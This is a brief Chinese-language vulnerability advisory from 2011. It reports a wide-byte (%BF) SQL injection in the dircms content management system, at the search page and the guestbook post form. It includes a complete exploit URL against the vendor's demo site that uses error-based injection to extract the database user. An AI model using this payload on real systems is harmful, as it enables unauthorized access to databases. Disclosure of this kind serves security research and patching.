dircms宽字节注入漏洞

发布日期：2011-03.11
发布作者：tojen

影响版本：dircms
官方网站：http://www.dircms.net

漏洞类型：SQL注射漏洞

漏洞描述：无意间黑盒发现dircms存在宽字节带来的注入问题，虽然流行过一段时间，貌似现在人们都不太关注这个问题。测试了下发现有俩个地方存在问题：

1.http://demo.dircms.net/lifecms/search/index.php?type=content&catid=127&xs=&wylx=%BF

    这个就不多说了
    exp:

http://demo.dircms.net/lifecms/search/index.php?type=content&catid=127&xs=%BF'and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(user(),0x3a)%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)k)%23%23

2.http://demo.dircms.net/lifecms/guestbook/index.php?action=post
    这个地方类似于帝国留言本那个宽字节注入，标题和内容处可以利用宽字节带入SQL语句执行

 

标签分类：